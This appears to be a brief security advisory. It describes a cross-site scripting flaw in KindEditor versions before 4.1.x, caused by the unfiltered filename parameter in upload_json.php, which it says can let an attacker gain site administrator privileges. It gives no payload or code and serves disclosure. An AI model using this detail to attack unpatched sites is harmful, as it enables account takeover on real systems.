KindEditor is a lightweight, open source (LGPL), cross-browser, web-based WYSIWYG HTML editor. KindEditor is capable of converting standard text areas to rich text editors. an XSS vulnerability exists in KindEditor prior to version 4.1.x. The vulnerability is related to the affected version not handling user input properly. An XSS vulnerability exists in upload_json.php due to the filename parameter not doing relevant data filtering. An attacker could use this vulnerability to gain site administrator privileges.